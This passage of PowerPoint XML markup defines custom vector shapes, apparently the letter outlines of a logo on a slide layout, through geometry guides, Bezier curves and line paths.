                  <a:gd name="T30" fmla="*/ 6 w 13"/>
                  <a:gd name="T31" fmla="*/ 40 h 44"/>
                  <a:gd name="T32" fmla="*/ 9 w 13"/>
                  <a:gd name="T33" fmla="*/ 38 h 44"/>
                  <a:gd name="T34" fmla="*/ 9 w 13"/>
                  <a:gd name="T35" fmla="*/ 32 h 44"/>
                  <a:gd name="T36" fmla="*/ 10 w 13"/>
                  <a:gd name="T37" fmla="*/ 30 h 44"/>
                  <a:gd name="T38" fmla="*/ 13 w 13"/>
                  <a:gd name="T39" fmla="*/ 28 h 44"/>
                  <a:gd name="T40" fmla="*/ 13 w 13"/>
                  <a:gd name="T41"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 h="44">
                    <a:moveTo>
                      <a:pt x="13" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="42"/>
                      <a:pt x="11" y="44"/>
                      <a:pt x="8" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="44"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="5" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="13" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="13"/>
                      <a:pt x="13" y="14"/>
                      <a:pt x="12" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                      <a:pt x="9" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="6"/>
                      <a:pt x="9" y="6"/>
                      <a:pt x="9" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="5"/>
                      <a:pt x="8" y="4"/>
                      <a:pt x="6" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="4"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="38"/>
                      <a:pt x="4" y="38"/>
                      <a:pt x="4" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="39"/>
                      <a:pt x="5" y="40"/>
                      <a:pt x="6" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="40"/>
                      <a:pt x="9" y="39"/>
                      <a:pt x="9" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="32"/>
                      <a:pt x="9" y="32"/>
                      <a:pt x="9" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="31"/>
                      <a:pt x="9" y="30"/>
                      <a:pt x="10" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="29"/>
                      <a:pt x="12" y="29"/>
                      <a:pt x="13" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13"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11"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6477000" y="808038"/>
                <a:ext cx="30163" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 15"/>
                  <a:gd name="T1" fmla="*/ 11 h 44"/>
                  <a:gd name="T2" fmla="*/ 10 w 15"/>
                  <a:gd name="T3" fmla="*/ 6 h 44"/>
                  <a:gd name="T4" fmla="*/ 7 w 15"/>
                  <a:gd name="T5" fmla="*/ 4 h 44"/>
                  <a:gd name="T6" fmla="*/ 5 w 15"/>
                  <a:gd name="T7" fmla="*/ 6 h 44"/>
                  <a:gd name="T8" fmla="*/ 5 w 15"/>
                  <a:gd name="T9" fmla="*/ 10 h 44"/>
                  <a:gd name="T10" fmla="*/ 7 w 15"/>
                  <a:gd name="T11" fmla="*/ 16 h 44"/>
                  <a:gd name="T12" fmla="*/ 12 w 15"/>
                  <a:gd name="T13" fmla="*/ 26 h 44"/>
                  <a:gd name="T14" fmla="*/ 14 w 15"/>
                  <a:gd name="T15" fmla="*/ 33 h 44"/>
                  <a:gd name="T16" fmla="*/ 14 w 15"/>
                  <a:gd name="T17" fmla="*/ 39 h 44"/>
                  <a:gd name="T18" fmla="*/ 9 w 15"/>
                  <a:gd name="T19" fmla="*/ 44 h 44"/>
                  <a:gd name="T20" fmla="*/ 6 w 15"/>
                  <a:gd name="T21" fmla="*/ 44 h 44"/>
                  <a:gd name="T22" fmla="*/ 0 w 15"/>
                  <a:gd name="T23" fmla="*/ 39 h 44"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>
                  <a:gd name="T25" fmla="*/ 34 h 44"/>
                  <a:gd name="T26" fmla="*/ 2 w 15"/>
                  <a:gd name="T27" fmla="*/ 32 h 44"/>
                  <a:gd name="T28" fmla="*/ 5 w 15"/>
                  <a:gd name="T29" fmla="*/ 30 h 44"/>
                  <a:gd name="T30" fmla="*/ 5 w 15"/>
                  <a:gd name="T31" fmla="*/ 38 h 44"/>
                  <a:gd name="T32" fmla="*/ 7 w 15"/>
                  <a:gd name="T33" fmla="*/ 40 h 44"/>
                  <a:gd name="T34" fmla="*/ 10 w 15"/>
                  <a:gd name="T35" fmla="*/ 38 h 44"/>
                  <a:gd name="T36" fmla="*/ 10 w 15"/>
                  <a:gd name="T37" fmla="*/ 33 h 44"/>
                  <a:gd name="T38" fmla="*/ 8 w 15"/>
                  <a:gd name="T39" fmla="*/ 27 h 44"/>
                  <a:gd name="T40" fmla="*/ 2 w 15"/>
                  <a:gd name="T41" fmla="*/ 17 h 44"/>
                  <a:gd name="T42" fmla="*/ 0 w 15"/>
                  <a:gd name="T43" fmla="*/ 10 h 44"/>
                  <a:gd name="T44" fmla="*/ 0 w 15"/>
                  <a:gd name="T45" fmla="*/ 5 h 44"/>
                  <a:gd name="T46" fmla="*/ 6 w 15"/>
                  <a:gd name="T47" fmla="*/ 0 h 44"/>
                  <a:gd name="T48" fmla="*/ 9 w 15"/>
                  <a:gd name="T49" fmla="*/ 0 h 44"/>
                  <a:gd name="T50" fmla="*/ 14 w 15"/>
                  <a:gd name="T51" fmla="*/ 5 h 44"/>
                  <a:gd name="T52" fmla="*/ 14 w 15"/>
                  <a:gd name="T53" fmla="*/ 7 h 44"/>
                  <a:gd name="T54" fmla="*/ 13 w 15"/>
                  <a:gd name="T55" fmla="*/ 10 h 44"/>
                  <a:gd name="T56" fmla="*/ 10 w 15"/>
                  <a:gd name="T57" fmla="*/ 1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 h="44">
                    <a:moveTo>
                      <a:pt x="10" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="5"/>
                      <a:pt x="9" y="4"/>
                      <a:pt x="7" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="5" y="5"/>
                      <a:pt x="5" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="10"/>
                      <a:pt x="5" y="10"/>
                      <a:pt x="5" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="13"/>
                      <a:pt x="7" y="16"/>
                      <a:pt x="7" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="26"/>
                      <a:pt x="12" y="26"/>
                      <a:pt x="12" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="30"/>
                      <a:pt x="14" y="33"/>
                      <a:pt x="14" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="39"/>
                      <a:pt x="14" y="39"/>
                      <a:pt x="14" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="42"/>
                      <a:pt x="12" y="44"/>
                      <a:pt x="9" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="44"/>
                      <a:pt x="6" y="44"/>
                      <a:pt x="6" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="44"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="34"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="0" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="33"/>
                      <a:pt x="1" y="32"/>
                      <a:pt x="2" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="32"/>
                      <a:pt x="4" y="31"/>
                      <a:pt x="5" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="38"/>
                      <a:pt x="5" y="38"/>
                      <a:pt x="5" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="39"/>
                      <a:pt x="6" y="40"/>
                      <a:pt x="7" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="40"/>
                      <a:pt x="10" y="39"/>
                      <a:pt x="10" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="33"/>
                      <a:pt x="10" y="33"/>
                      <a:pt x="10" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="30"/>
                      <a:pt x="8" y="27"/>
                      <a:pt x="8" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="17"/>
                      <a:pt x="2" y="17"/>
                      <a:pt x="2" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="14" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="7"/>
                      <a:pt x="14" y="7"/>
                      <a:pt x="14" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="9"/>
                      <a:pt x="14" y="9"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="10"/>
                      <a:pt x="11" y="11"/>
                      <a:pt x="1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12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5370513" y="1352550"/>
                <a:ext cx="39688" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 4 h 20"/>
                  <a:gd name="T2" fmla="*/ 18 w 19"/>
                  <a:gd name="T3" fmla="*/ 5 h 20"/>
                  <a:gd name="T4" fmla="*/ 15 w 19"/>
                  <a:gd name="T5" fmla="*/ 2 h 20"/>
                  <a:gd name="T6" fmla="*/ 11 w 19"/>
                  <a:gd name="T7" fmla="*/ 2 h 20"/>
                  <a:gd name="T8" fmla="*/ 6 w 19"/>
                  <a:gd name="T9" fmla="*/ 3 h 20"/>
                  <a:gd name="T10" fmla="*/ 3 w 19"/>
                  <a:gd name="T11" fmla="*/ 6 h 20"/>
                  <a:gd name="T12" fmla="*/ 2 w 19"/>
                  <a:gd name="T13" fmla="*/ 10 h 20"/>
                  <a:gd name="T14" fmla="*/ 5 w 19"/>
                  <a:gd name="T15" fmla="*/ 16 h 20"/>
                  <a:gd name="T16" fmla="*/ 11 w 19"/>
                  <a:gd name="T17" fmla="*/ 18 h 20"/>
                  <a:gd name="T18" fmla="*/ 18 w 19"/>
                  <a:gd name="T19" fmla="*/ 15 h 20"/>
                  <a:gd name="T20" fmla="*/ 19 w 19"/>
                  <a:gd name="T21" fmla="*/ 16 h 20"/>
                  <a:gd name="T22" fmla="*/ 16 w 19"/>
                  <a:gd name="T23" fmla="*/ 19 h 20"/>
                  <a:gd name="T24" fmla="*/ 11 w 19"/>
                  <a:gd name="T25" fmla="*/ 20 h 20"/>
                  <a:gd name="T26" fmla="*/ 3 w 19"/>
                  <a:gd name="T27" fmla="*/ 17 h 20"/>
                  <a:gd name="T28" fmla="*/ 0 w 19"/>
                  <a:gd name="T29" fmla="*/ 10 h 20"/>
                  <a:gd name="T30" fmla="*/ 3 w 19"/>
                  <a:gd name="T31" fmla="*/ 3 h 20"/>
                  <a:gd name="T32" fmla="*/ 11 w 19"/>
                  <a:gd name="T33" fmla="*/ 0 h 20"/>
                  <a:gd name="T34" fmla="*/ 16 w 19"/>
                  <a:gd name="T35" fmla="*/ 1 h 20"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37"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20">
                    <a:moveTo>
                      <a:pt x="19" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="5"/>
                      <a:pt x="18" y="5"/>
                      <a:pt x="18" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="4"/>
                      <a:pt x="16" y="3"/>
                      <a:pt x="15" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="2"/>
                      <a:pt x="12" y="2"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="2"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="3"/>
                      <a:pt x="4" y="4"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="7"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="12"/>
                      <a:pt x="3" y="14"/>
                      <a:pt x="5" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="18"/>
                      <a:pt x="8" y="18"/>
                      <a:pt x="11" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="18"/>
                      <a:pt x="16" y="17"/>
                      <a:pt x="18" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="16"/>
                      <a:pt x="19" y="16"/>
                      <a:pt x="19" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="18"/>
                      <a:pt x="17" y="19"/>
                      <a:pt x="16" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="20"/>
                      <a:pt x="13" y="20"/>
                      <a:pt x="11" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="20"/>
                      <a:pt x="5" y="19"/>
                      <a:pt x="3" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="7"/>
                      <a:pt x="1" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="1"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="14" y="0"/>
                      <a:pt x="16" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="1"/>
                      <a:pt x="18" y="2"/>
                      <a:pt x="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13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5418138" y="1352550"/>
                <a:ext cx="28575" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 18"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 2 w 18"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 2 w 18"/>
                  <a:gd name="T5" fmla="*/ 10 h 25"/>
                  <a:gd name="T6" fmla="*/ 15 w 18"/>
                  <a:gd name="T7" fmla="*/ 10 h 25"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 18 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 18 w 18"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 15 w 18"/>
                  <a:gd name="T15" fmla="*/ 25 h 25"/>
                  <a:gd name="T16" fmla="*/ 15 w 18"/>
                  <a:gd name="T17" fmla="*/ 12 h 25"/>
                  <a:gd name="T18" fmla="*/ 2 w 18"/>
                  <a:gd name="T19" fmla="*/ 12 h 25"/>
                  <a:gd name="T20" fmla="*/ 2 w 18"/>
                  <a:gd name="T21" fmla="*/ 25 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 18"/>
                  <a:gd name="T23" fmla="*/ 25 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 18"/>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5">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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14"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453063" y="1352550"/>
                <a:ext cx="38100" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 24 w 24"/>
                  <a:gd name="T3" fmla="*/ 25 h 25"/>
                  <a:gd name="T4" fmla="*/ 22 w 24"/>
                  <a:gd name="T5" fmla="*/ 25 h 25"/>
                  <a:gd name="T6" fmla="*/ 18 w 24"/>
                  <a:gd name="T7" fmla="*/ 16 h 25"/>
                  <a:gd name="T8" fmla="*/ 6 w 24"/>
                  <a:gd name="T9" fmla="*/ 16 h 25"/>
                  <a:gd name="T10" fmla="*/ 2 w 24"/>
                  <a:gd name="T11" fmla="*/ 25 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 24"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 11 w 24"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 13 w 24"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 13 w 24"/>
                  <a:gd name="T19" fmla="*/ 5 h 25"/>
                  <a:gd name="T20" fmla="*/ 7 w 24"/>
                  <a:gd name="T21" fmla="*/ 14 h 25"/>
                  <a:gd name="T22" fmla="*/ 16 w 24"/>
                  <a:gd name="T23" fmla="*/ 14 h 25"/>
                  <a:gd name="T24" fmla="*/ 13 w 24"/>
                  <a:gd name="T2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5">
                    <a:moveTo>
                      <a:pt x="13" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5497513" y="1352550"/>
                <a:ext cx="33338" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 21"/>
                  <a:gd name="T1" fmla="*/ 25 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 21"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 1 w 21"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 18 w 21"/>
                  <a:gd name="T7" fmla="*/ 19 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 21"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 21 w 21"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 21 w 21"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 19 w 21"/>
                  <a:gd name="T15" fmla="*/ 25 h 25"/>
                  <a:gd name="T16" fmla="*/ 3 w 21"/>
                  <a:gd name="T17" fmla="*/ 6 h 25"/>
                  <a:gd name="T18" fmla="*/ 3 w 21"/>
                  <a:gd name="T19" fmla="*/ 25 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 21"/>
                  <a:gd name="T2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5">
                    <a:moveTo>
                      <a:pt x="0" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:ln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16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5537200" y="1352550"/>
                <a:ext cx="42863" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 21"/>
                  <a:gd name="T1" fmla="*/ 3 h 20"/>
                  <a:gd name="T2" fmla="*/ 19 w 21"/>
                  <a:gd name="T3" fmla="*/ 5 h 20"/>
                  <a:gd name="T4" fmla="*/ 15 w 21"/>
                  <a:gd name="T5" fmla="*/ 2 h 20"/>
                  <a:gd name="T6" fmla="*/ 11 w 21"/>
                  <a:gd name="T7" fmla="*/ 2 h 20"/>
                  <a:gd name="T8" fmla="*/ 7 w 21"/>
                  <a:gd name="T9" fmla="*/ 3 h 20"/>
                  <a:gd name="T10" fmla="*/ 4 w 21"/>
                  <a:gd name="T11" fmla="*/ 6 h 20"/>
                  <a:gd name="T12" fmla="*/ 3 w 21"/>
                  <a:gd name="T13" fmla="*/ 10 h 20"/>
                  <a:gd name="T14" fmla="*/ 4 w 21"/>
                  <a:gd name="T15" fmla="*/ 14 h 20"/>
                  <a:gd name="T16" fmla="*/ 7 w 21"/>
                  <a:gd name="T17" fmla="*/ 17 h 20"/>
                  <a:gd name="T18" fmla="*/ 12 w 21"/>
                  <a:gd name="T19" fmla="*/ 18 h 20"/>
                  <a:gd name="T20" fmla="*/ 17 w 21"/>
                  <a:gd name="T21" fmla="*/ 17 h 20"/>
                  <a:gd name="T22" fmla="*/ 19 w 21"/>
                  <a:gd name="T23" fmla="*/ 12 h 20"/>
                  <a:gd name="T24" fmla="*/ 13 w 21"/>
                  <a:gd name="T25" fmla="*/ 12 h 20"/>
                  <a:gd name="T26" fmla="*/ 13 w 21"/>
                  <a:gd name="T27" fmla="*/ 10 h 20"/>
                  <a:gd name="T28" fmla="*/ 21 w 21"/>
                  <a:gd name="T29" fmla="*/ 10 h 20"/>
                  <a:gd name="T30" fmla="*/ 19 w 21"/>
                  <a:gd name="T31" fmla="*/ 18 h 20"/>
                  <a:gd name="T32" fmla="*/ 12 w 21"/>
                  <a:gd name="T33" fmla="*/ 20 h 20"/>
                  <a:gd name="T34" fmla="*/ 3 w 21"/>
                  <a:gd name="T35" fmla="*/ 17 h 20"/>
                  <a:gd name="T36" fmla="*/ 0 w 21"/>
                  <a:gd name="T37" fmla="*/ 10 h 20"/>
                  <a:gd name="T38" fmla="*/ 2 w 21"/>
                  <a:gd name="T39" fmla="*/ 5 h 20"/>
                  <a:gd name="T40" fmla="*/ 6 w 21"/>
                  <a:gd name="T41" fmla="*/ 1 h 20"/>
                  <a:gd name="T42" fmla="*/ 11 w 21"/>
                  <a:gd name="T43" fmla="*/ 0 h 20"/>
                  <a:gd name="T44" fmla="*/ 16 w 21"/>
                  <a:gd name="T45" fmla="*/ 1 h 20"/>
                  <a:gd name="T46" fmla="*/ 20 w 21"/>
                  <a:gd name="T4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 h="20">
                    <a:moveTo>
                      <a:pt x="20" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="5"/>
                      <a:pt x="19" y="5"/>
                      <a:pt x="19" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="4"/>
                      <a:pt x="16" y="3"/>
                      <a:pt x="15" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="2"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="2"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="7" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="3"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="7"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="3" y="10"/>
